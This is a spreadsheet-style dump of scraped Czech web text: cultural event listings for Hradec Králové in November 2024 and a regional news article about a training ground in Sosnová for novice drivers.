    <t>Kalendarium 19.prosinec - čtvrtek od 19:30 hodin Kulturní akce dne: 22. 11. 2024 2024-11-15 00:00:00 2025-01-17 18:00:00 PREMIÉRA 2024 22.listopadu - pátek od 00:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. UNIVERZITA HRADEC KRÁLOVÉ: DNES SLAVÍ! 22.listopadu - pátek od 00:01 hodin Dovolujeme si vás pozvat na výstavu prací studentů 2. ročníku oboru Grafická a intermediální tvorba Katedry výtvarné kultury a textilní tvorby PF UHK, kteří představí výběr plakátů k oslavám 75. výročí založení Studijní a vědecké knihovny v Hradci Králové . Práce vznikly ve spolupráci se SVK HK. Práce můžete vidět v prostoru budovy už 8. 11. Výstavu najdete ve 2. NP v galerii Automat. FOTÍME EVROPU, JIŽ 20 LET! 22.listopadu - pátek od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 22.listopadu - pátek od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 22.listopadu - pátek od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 22.listopadu - pátek od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 22.listopadu - pátek od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169, (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 State of EmergencyVýjimečný stav 22.listopadu - pátek od 14:00 hodin Rozhlasový zpravodaj na Blízkém východě Karel Beran přijíždí na základě anonymu na otočku soukromě do Prahy . V Kamburu, který neprofesionálně opustil, však právě ve stejnou chvíli vypuká revoluce. Dostát povinnosti reportéra donutí zkušeného profesionála k mystifikačním reportážím, kdy vřavu arabské revoluce simuluje na kuchyňských spotřebičích ve vinohradském bytě. Rozkročen mezi řešením osobního problému a povinností zpravodajsky informovat posluchače se však chytne do vlastní pasti. Když se na základě vysoce sledovaných příspěvků rozhodně Český rozhlas poslat za zpravodajem podpůrný tým, ocitne se před neřešitelnou volbou: buď se přizná k mediálnímu podvodu, nebo musí předstírat vlastní smrt. 80 vstupné 80 Kč | Velký sál | Bio Central Velký sál 2024-11-22 16:30:00 2024-11-22 17:30:00 Dětský pořad vhodný pro diváky ve věku od 5 do 8 let. 22.listopadu - pátek od 16:30 hodin - astronomická pohádka a hvězdná obloha s živým výkladem lektora - digitální planetárium - 60 minut - pořad vhodný pro diváky od 5 let do 8 let v doprovodu dospělé osoby Pořad, který je svým obsahem i délkou uzpůsoben pro nejmenší návštěvníky. V digitálním planetáriu se nejprve podíváme na hvězdnou oblohu a prohlédneme si souhvězdí. Druhá část programu bude věnována pohádce. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Foreign LanguageLangue étrangere 22.listopadu - pátek od 17:30 hodin Sedmnáctiletá Fanny se vydává na jazykový pobyt do Německa . V Lipsku se setkává s Lenou, svou německou korespondentkou, která se chce angažovat v politickém aktivismu. Ohromená Fanny chce na mladou Němku zapůsobit a tak si vymyslí úplně nový život. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-22 18:00:00 2024-11-22 19:30:00 22.listopadu - pátek od 18:00 hodin Rádi bychom Vás rádi pozvali na Adventní koncert v podání Martina Růži na Slezské plovárně. Martin Růža je zpěvák s unikátním hlasový rozsahem, „objev“ dirigenta Václava Hybše . Na hudební scéně se pohybuje již řadu let. Vystupuje s předními orchestry, účinkuje v divadlech, muzikálech atd. Zpívá hity velkých českých i světových interpretů. Klavírní doprovod Karel Koldinský. Venkovní bar bude otevřený od 17:00, vystoupení začne v 18:00. Vstupenky jsou již nyní v prodeji na GoOut nebo na tel. 603143199. KDO BUDE DALŠÍ 22.listopadu - pátek od 18:00 hodin Inscenace inspirovaná krátkým hororovým filmem Pavla Soukupa TŘÍDA SMRTI o záhadných úmrtích žáků jedné třídy. Režie Jiřina Krtičková. 22.listopadu - pátek od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Living Worlds · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Living Worlds. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. ANNA K. - ÚDOLÍ VČEL TOUR 22.listopadu - pátek od 19:00 hodin Oblíbená zpěvačka Anna K. se stala vítězkou letošního ročníku hudebních Cen Anděl Coca-Cola 2023. Sošku získala za skladbu „Údolí včel“ ze stejnojmenného alba. Písně z nového alba i léty prověřené hity zazní v Hradci Králové v rámci podzimního turné v PETROF Gallery. Gabriela PreissováRežie: Diana Šoltýsová 22.listopadu - pátek od 19:00 hodin Kostelnička a její pastorkyňa Jenůfa žijí v uzavřené vesnické komunitě. Pověst ctnostné ženy a respekt od sousedů jsou to hlavní, co se Kostelnička snaží uchránit. Co všechno musí ale udělat, aby toho dosáhla? Opravdu pýcha předchází pád? A kam až jsme schopní zajít, když někoho milujeme? V dramatu Gabriely Preissové se v roli Kostelničky divákům představí Pavla Tomicová (v inscenaci z roku 1996 ztvárnila naopak Jenůfu). Do Klicperova divadla se vrátí režisérka Diana Šoltýsová (režisérka inscenace HANA) na jejíž osobitý styl se můžete nyní těšit i na Hlavní scéně. Délka představení 2:00 s přestávkou. 320 vstupné 280 Kč, 320 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-22 19:00:00 2024-11-22 21:00:00 120. výročí založení oddílu atletiky 22.listopadu - pátek od 19:00 hodin Slavnostní večer k připomenutí 120. výročí založení oddílu atletiky T. J. Sokol Hradec Králové Program večera: připomenutí 120. výročí založení oddílu atletiky představení výroční výstavy a publikace uvedení do síně slávy výjimečných atletů historie ocenění nejlepších atletů posledního desetiletí vystoupení kapely JAZZ POLICE po oficiální části číše vína v přilehlých prostorách AFTERPARTY v přilehlé restauraci PAVIJA´n V den akce a den po akci vstup zdarma do Muzea východních Čech Hradec Králové na výstavu o atletice 200 vstupné 200 Kč | Sál Filharmonie Hradec Králové | Sál Filharmonie HK - Ostatní pořadatelé Sál Filharmonie Hradec Králové 2024-11-22 19:00:00 2024-11-22 22:00:00 BOSSANOVA NIGHT 22.listopadu - pátek od 19:00 hodin Kapela Camões House Band je složená z hudebníků z různých koutů světa žijících v Praze , které pojí společná vášeň k hudbě z portugalsky mluvících zemí. Zaměřuje se na interpretaci hudby lusofonního světa, především na hudbu z Portugalska , Brazílie , Kapverdských ostrovů a Angoly i na vlastní autorské písně. Vytvářejí svěží fúzi popu, jazzu, moderní brazilské bossy, kapverdské morny nebo portugalského fada. Vstupné 350 Kč 22.listopadu - pátek od 19:00 hodin Bluegrass v Lucii, vstupné 200 kč Saint-ExupérySaint-Ex 22.listopadu - pátek od 20:00 hodin V roce 1930 létá Antoine de Saint-Exupéry coby poštovní kurýr do Argentiny . Když kdesi v Andách zmizí jeho nejlepší kamarád, vynikající pilot Henri Guillaumet , Saint-Ex se ho vydává hledat. Mise předem odsouzená k neúspěchu ho přiměje překonat sebe sama. A proměnit svou schopnost snít ve svou nejsilnější stránku. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_63_3264548790_da9dcb3d69f550a4f920.html</t>
  </si>
  <si>
    <t>da9dcb3d69f550a4f920</t>
  </si>
  <si>
    <t>Disko nehody decimují mladé řidiče. V Sosnové je naučí, jak jim uniknout</t>
  </si>
  <si>
    <t>Disko nehody decimují mladé řidiče. V Sosnové je naučí, jak jim uniknout „Každý rok v České republice umírá přibližně 100 začínajících řidičů . Proto se poslední dobou více zaměřujeme na jejich přípravu,“ vysvětlil předseda Asociace autoškol Aleš Horčička. Benefitem Driving Campu Sosnová je především klid, v němž se mohou absolventi autoškoly naučit základy. „Pouhých deset metrů od učebny si projdou vše, čeho se obávali, rozjezd, řazení, změnu rychlostních stupňů, parkování, ale i kruhový objezd, což je unikát tohoto cvičiště,“ uvedl Hořčička. play_fill Českolipsko Zapomenout by se nemělo na nic. „Pokud chceme plnohodnotného řidiče, potřebujeme, aby všechny manévry, které bude potřebovat, nezkoušel sám, ale s kvalifikovaným učitelem,“ dodal. V rámci zlepšení výcviku se v Sosnové zavádí i systém L17, který umožňuje mladým absolvovat výuku už od 17 let a následně řídit pod dohledem mentora. „Chceme, aby si žáci mohli všechny manévry vyzkoušet v bezpečném prostoru, než vyjedou do běžného provozu,“ poznamenal. Majitelem prostoru je pojišťovna Kooperativa. Autoškolu Kooperativa nevlastní, ale organizuje ji a je součástí areálu Autodrom Sosnová. „Tenhle areál má několik zvláštností. Od úplného začátku se tu můžete vyškolit na profesionálního řidiče s jakýmkoliv druhem vozidla. Můžete si vyzkoušet nebezpečné situace, což je daleko lepší na řízených plochách pod dohledem instruktorů, než je trénovat s kamarádem v noci na silnici,“ poznamenal ředitel Kooperativy Martin Diviš . play_fill Českolipsko Areál je relativně malý. „Veliké okruhy, které nalezneme po republice, jsou určené spíše na závodění. Zde je možnost si věci jen vyzkoušet,“ poznamenal. V plánu je dát prostor i ostatním výukovým pracovištím. „Do budoucna bychom chtěli, aby byl přístupný nejenom lokální autoškole, ale aby si i ostatní autoškoly mohly kdykoliv prostor zarezervovat a využít ho,“ uvedl. close info Zdroj: Deník/Ladislava Sdrzallek zoom_in V Driving Campu Sosnová vzniklo nové cvičiště, které se zaměřuje na výuku žáků autoškol. Inspirace přišla z Rakouska a Švédska , kde kladou větší důraz na praktickou přípravu. Předseda asociace autoškol zdůraznil, že v Rakousku musí budoucí řidiči projít povinně cvičištěm, modelací rizikových situací a kurzy na polygonu. V České republice je povinné pouze cvičiště, zatímco další část výcviku, jako například kurzy bezpečné jízdy, chybí. Podle Horčičky by se tato praxe mohla stát standardem: „Vyzkoušet si krizové brzdění, vyhýbací manévr nebo simulaci smyku je pro každého řidiče velkou výhodou.“ play_fill Českolipsko Ředitel Kooperativy, k tomu dodal, že investice do kvalitní přípravy mladých řidičů může ušetřit mnoho životů. V Rakousku snížili za posledních 20 let počet fatálních nehod mezi mladými řidiči do 24 let o 35 procent. Tento pokles považuje Diviš za důkaz, že podobný systém stojí za zavedení i v Česku. „Pojišťovny dokonce používají termín „disko nehody“, což je nehoda, kdy mladí jedou z diskotéky. Je typická a stojí opravdu velký počet životů,“ poznamenal Diviš . Charakteristickým znakem je parta mladých lidí, která opouští nějakou noční akci. „Skupinka jede ve dvě ráno, kdy není zvyklá fungovat. Řidič většinou není opilý , je to jeden z party, který zrovna nepožil alkohol . A kamarád řekne: Hele, ty pojedeš. Takže jede s autem, na které není zvyklý,“ vysvětlil. Řidič obvykle dodržuje všechny předpisy , ale nezná manévry vozidla. „Nechápe, že auto s pěti lidmi se chová úplně jinak, než když s ním jezdí sám, protože v 90 procentech případů jezdí ve dvou. Tyhle nehody stojí obrovské emoce, ale především obrovské peníze, protože to většinou skončí tak, že nezvládne řízení, vyletí ze silnice a vrazí do stromu,“ popsal typický smutný příběh. play_fill Českolipsko Dle něj se nejedná o jednotky. „Za posledních třicet let jich bylo hrozně moc. A legislativně bylo vše dodrženo. Ten člověk nepil, měl papíry, ale neměl tu zkušenost. Jestli tohle můžeme změnit, tak to má smysl,“ myslí si. Autoškoly na Českolipsku nabízejí kurzy za ceny srovnatelné s jinými částmi republiky. Například v autoškole Hořčička stojí řidičské oprávnění 19 900 korun a zahrnuje kurz bezpečné jízdy, který sám o sobě stojí 3 993 korun na autodromu Sosnová. V autoškole Cenger zaplatíte 19 000 korun, v Kodetu v centru České Lípy 18 000 korun a autoškola Archa v Mimoni nabízí řidičské oprávnění za 18 800 korun možností platby na splátky. MOHLO BY VÁS ZAUJMOUT: Křižovatka u autobusáku v Lípě stále mate řidiče. Ti často jen neznají pravidla Křižovatka u autobusového nádraží v České Lípě | Video: Ladislava Sdrzallek Autor: Ladislava Sdrzallek Autor person Ladislava Sdrzallek</t>
  </si>
  <si>
    <t>20241101_630_3239871914_f19db9c55a247e138a11.html</t>
  </si>
  <si>
    <t>f19db9c55a247e138a11</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 30. 11. 2024 2024-11-15 00:00:00 2025-01-17 18:00:00 PREMIÉRA 2024 30.listopadu - sobota od 00:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 30.listopadu - sobota od 00:01 hodin Pátek 15–20 hodin Sobota 9–19 hodin Neděle 9–16 hodin Těsné okolí muzejní budovy na Eliščině nábřeží a část ulice Palackého bude patřit téměř stovce producentů, řemeslníků a prodejců s širokou nabídkou adventních věnců, dekorací, perníků, šperků, svíček z včelího vosku, mýdla či perličkových ozdob z Poniklé a dalších produktů. Samozřejmostí se stalo zastoupení řemeslníků oceněných titulem „Nositel tradice lidových řemesel České republiky “ a také výrobců dodržujících tradiční výrobní postupy zapsané na republikovém Seznamu nemateriálních kulturních statků ČR nebo na Reprezentativním seznamu nemateriálního kulturního dědictví lidstva. Doprovodný program: * pěvecký sbor Laděníčko ZUŠ Střezina pod vedením Lady Holaňové, * v sobotu a v neděli se budou konat speciální dílny s řemeslníky, z nichž někteří jsou držiteli ocenění „Zlatý kolovrat“ nebo „Nositel tradice lidových řemesel“. Ve vestibulech tak bude možné nahlédnout pod ruce řezbáře a vyzkoušet si například techniku modrotisku zapsanou na reprezentativním seznamu UNESCO, objevit kouzlo zdobených perníčků, naučit se základy výroby figurek ze šustí, vyzkoušet si drátování nebo výrobu ze skleněných korálků . Nebude chybět vánoční zvykosloví, které představí Spolek lidové tvorby Hradec Králové * komentované prohlídky aktuálních výstav a stálé expozice * vánoční fotoateliér * venkovní dětské projížďky na oslících Venkovní program trhů je zdarma. Jednotné vstupné 90 Kč platí pouze do vnitřních prostor muzea a umožňuje návštěvu všech výstav a expozice. SALON VÝCHODOČESKÉ FOTOGRAFIE 30.listopadu - sobota od 00:01 hodin Výstava 7. ročníku Salonu východočeské fotografie, vyhledávané přehlídky, která se koná jednou za tři roky, a je výběrovým přehledem aktuální tvorby fotografů nejen východních Čech . Své fotografie zde vystaví 41 autorů a 6 hostů (Radek Kalhous, Martina Kopecká Jurčeková, Ctibor Košťál , Zdeněk Vojáček, Luděk Vojtěchovský , Roman Vondrouš). Porotkyně Štěpánka Bieleszová , kurátorka sbírky fotografie Muzea umění Olomouc , a Kamila Bendorffová, fotografka, cestovatelka, organizátorka fotofestivalu v Blatné , ocenily širokou škálu stylů, témat a technologických procesů, z nichž každý divákovi nabízí něco jedinečného. Porota letošní 7. ročník Salonu východočeské fotografie chápe jako mimořádnou příležitost povzbudit a objevit regionální tvůrce, kteří, ačkoli nepůsobí v centru dění, jsou schopni velmi originálně vidět svět v novém světle. 30.listopadu - sobota od 08:00 hodin --- Trhy se konají zpravidla pravidelně každých 14 dní. Výjimečné budou nejen skvělou nabídkou lokálních produktů, ale i tím, že vždy bude připraven zajímavý doprovodný program pro děti. Necháme dětem i jejich doprovodu nahlédnout do života farmářů, ukážeme, jak se staráme o půdu, pěstujeme zeleninu, květiny, chováme dobytek. Děti si budou moci vyzkoušet některé činnosti a třeba si i něco vyrobit nebo zasadit a odnést domů. FOTÍME EVROPU, JIŽ 20 LET! 30.listopadu - sobota od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 30.listopadu - sobota od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. GLADIATOR RACE FINAL 30.listopadu - sobota od 09:00 hodin Poslední závod sezóny si žádá speciální přístup. Připravte se na rozmazlování, spoustu dárků a v neposlední řadě i nejlepší a nejzábavnější překážky, které Gladiator Race nabízí. Svoji náruč naposledy pro závod otevře Gladiator Race Arena na Stříbrném rybníku v Hradci Králové . Čeká na Vás jedinečný zážitek plný zábavy, překvapení, dobrodružství a adrenalinu! VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 30.listopadu - sobota od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 30.listopadu - sobota od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 30.listopadu - sobota od 10:00 hodin Vítání adventu na Slezské plovárna Sobota 30. 11.... 10:00-17:00 tradiční vánoční trhy - dílničky pro děti - stánkový prodej - občerstvení vstupné 50 Kč, děti zdarma Puffin Rock and the New Friends 30.listopadu - sobota od 10:00 hodin Napínavý příběh, který oslavuje nádherný život vzácných ptáků a zahrnuje témata odvahy a přátelství. Když nechráněné vajíčko zmizí za záhadných okolností, Oona a její přátelé závodí s časem, aby jej přinesli zpět domů. Skutečnou hrozbou je však v tomto ekologickém příběhu změna klimatu - opeřená skála přivítá komunitu zvířecích uprchlíků, jejichž životní prostředí bylo zpustošeno bouřemi. A po několika nedorozuměních a hrozby ze strany racků si papuchalka Oona a její bratříček Baba najdou nové kamarády. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-30 10:00:00 2024-11-30 10:45:00 Pohádky v AdaluUrčeno dětem od 3 let. 30.listopadu - sobota od 10:00 hodin Maňáskové představení dvou klasických pohádek. „O Palečkovi“ je příběh o šikovném synkovi, který se narodil zrovna dnes ráno... „Hrnečku vař!“ vypráví příběh nejen pro mlsné jazýčky. Pohádky jsou laskavé a jsou hrány na jevišti i kolem něho s pomocníčky z publika. Účinkuje Jarka Holasová, určeno dětem od tří let. * V sále je volný zasedací pořádek. * Vstupenku do sálu musí mít dětský i dospělý divák. Pokud je divákem dítě mladší dvou let, má vstup zdarma, ovšem bez nároku na místo. * Prosíme dospělé diváky, aby při výběru míst brali ohled na ty malé, kterým by případně mohli bránit ve výhledu. Děkujeme za vstřícnost a těšíme se na Vaši návštěvu! 30.listopadu - sobota od 10:00 hodin DIZAJNIŠTĚ - Krátkodobá výstava Kreativní hřiště pro malé i velké Kurátor: Tereza Vlašímská Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Layla Hruška Ottová, Štěpán Uherka Grafické úpravy: Jindřich Max Pavlíček Produkce: Barbora Kalinová, Martina Štětinová Technické řešení: Petr Seiner Světla: Libor Petr Lektorský program: Kateřina Hanková, Jana Neduha, Klára Fidlerová, Klára Svobodová Interaktivní výstava Dizajniště hravou formou seznamuje s metodou designového myšlení a krok za krokem děti naučí, jak myslet a navrhovat jako designér. Výstava provede návštěvníky cestou od designového nápadu až k jeho realizaci pomocí designového myšlení. Prostřednictvím jednoduchého návodu s pěti fázemi - empatie, definice, ideace, prototyp, testování - mohou účastníci ve své práci i každodenním životě objevovat nová kreativní řešení a zažít přitom spoustu tvůrčího dobrodružství. Designové myšlení učí kreativnímu řešení problémů, generování nápadů a schopnostem je vyhodnocovat, rozvíjí komunikační a prezentační dovednosti, podporuje práci v kolektivu, je inkluzivní, je zábavné, poučné a hravé. Pro školní kolektivy nabízíme lektorské programy, které návštěvníky provedou je celým kreativním procesem. Žáci a studenti si na nich osvojí sběr, třídění, analyzování a vyhodnocování informací a jak je mohou tvůrčím způsobem aplikovat v nových souvislostech a situacích. V pěti krocích se dostanou od nápadu k až realizaci. Účastníci přirozeně rozvinou celou řadu důležitých kompetencí: týmovou spolupráci, prezentaci, komunikaci a vizualizaci myšlenek, argumentaci, vedení diskuse i polemiky. Designové myšlení spojuje, narušuje bariéry mezi lidmi a přispívá k sebenaplnění. Lektorské programy pro školní kolektivy jsou uzpůsobeny různým věkovým kategoriím návštěvníků základních i středních škol. Autory expozice jsou designoví aktivisté, kreativci a patrioti z karlovarského spolku PROTEBE live, který již od roku 2005 buduje image Karlových Varů jako kulturního a občansky aktivního města. K tomu nemalou měrou pomáhá jejich kreativní centrum DIZAJNPARK v prostorách tuhnického výměníku. PŘÍBĚH DRAKU 1958-2018 - Stálá expozice Koncepce a libreto výstavy: Tomáš Jarkovský Návrh a realizace instalací: Tereza Vašíčková Odborná konzultace: Miloslav Klíma Spolupráce na instalaci: Dílny a technici Divadla Drak Určeno pro celou rodinu. Výstava Příběh Draku 1958–2018 vypráví příběh 60leté historie Divadla Drak. Prostřednictvím vystavených loutek, fotografií, scénografických návrhů, ukázek z inscenací a dalších dobových materiálů zachycuje proměny drakovského divadelního jazyka a zároveň přibližuje nezaměnitelnou atmosféru divadla. Představuje Drak jako místo tvorby, ale také jako křižovatku osudů těch, kteří jeho příběh po 60 let spoluvytvářeli. Expozice se skládá z 31 zastavení věnovaných významným inscenacím, osobnostem nebo událostem v historii divadla, která jsou rozdělena do osmi tematických celků. Prvních pět je řazeno chronologicky a vypraví příběh divadla od jeho počátků až k oslavám 60. výročí založení. Připomíná důležité milníky historie Draku a představuje významné inscenace či osobnosti, které jsou s jednotlivými etapami vývoje divadla spojeny. Poslední tři části-zastavení představující kompletní výpravu legendární inscenace O Sněhurce, unikátní dokument Jana Špáty a bilanci bohaté zájezdové činnosti divadla pak společně tvoří jakýsi epilog výstavy. Stručný komentář ke každému zastavení naleznete spolu s orientační mapkou v tištěném průvodci výstavou. Výstava byla realizována s finanční podporou Nadace ČEZ . OBRAZÁRNA | GEBAUEROVA HLAVA 30.listopadu - sobota od 10:00 hodin PÁ 29/11 | 15:00–17:00 (rodiče s dětmi 4–6 let) SO 30/11 | 10:00–12:00 (rodiče s dětmi 6–10 let) PÁ 13/12 | 15:00–17:00 (rodiče s dětmi 6–10 let) SO 14/12 | 10:00–12:00 (náctiletí 10–15 let) Rezervace: edukace@galeriehk.cz BambiBambi, L'histoire d'une vie dans les bois 30.listopadu - sobota od 10:30 hodin Malý kolouch Bambi žije se svou maminkou uprostřed rozlehlých lesů. Jeho dny jsou od narození naplněny nejen skotačením, ale i objevováním a poznáváním tajemství lesa. Matka ho každý den učí nové věci, aby se, až vyroste, stal silným a statečným jelenem. Jeho nejbližšími přáteli se stávají králík Dupík a mýval Kvítek, se kterými se dá i pod dohledem rozvážného havrana zažít spousta legrace. Nejvíc času Bambi rád tráví se svou kamarádkou, mladou laňkou Fili, která nezkazí žádnou zábavu. Na podzim však jejich bezstarostný život změní příchod lovců. Během zoufalého úprku je Bambi oddělen od matky a zůstává sám. Vyděšeného ho najde velký, majestátní jelen, který není nikdo jiný než jeho otec. Bambi se musí postupně naučit, jak se chránit před nebezpečím divočiny a jak dospět… 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-30 11:00:00 2024-11-30 11:00:00 30.listopadu - sobota od 11:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169, (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-30 13:30:00 2024-11-30 14:42:00 Big ManVelký pán 30.listopadu - sobota od 13:30 hodin Hlavní hrdina Malý Pán si užívá společenský život v lesní vesnici, se svou milovanou Majolenkou provozuje kiosek a s kamarády mají kapelu. Idylu však začnou narušovat zprávy o podivných Jeleňácích ohrožujících obyvatele lesa. Co jsou zač? A podezření budí i podivínský ochranitel doktor Zetek a jeho všudypřítomné televizory. Z robotů, kteří mají obyvatelům lesa pomoci, jdou také spíše obavy. Poklidná přátelská atmosféra lesa je pryč, obyvatele vesnice postupně ovládá strach a panika. Kiosek zeje prázdnotou a obavám začne propadat i sám Malý Pán. Naštěstí musí svůj strach překonat a vydat se na cestu, aby zachránil svou Majolenku, přátele a vlastně i svůj domov. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-29 14:00:00 2024-12-01 18:00:00 30.listopadu - sobota od 14:00 hodin Pá: 14:00-18:00 Living LargeŽivot k sežrání 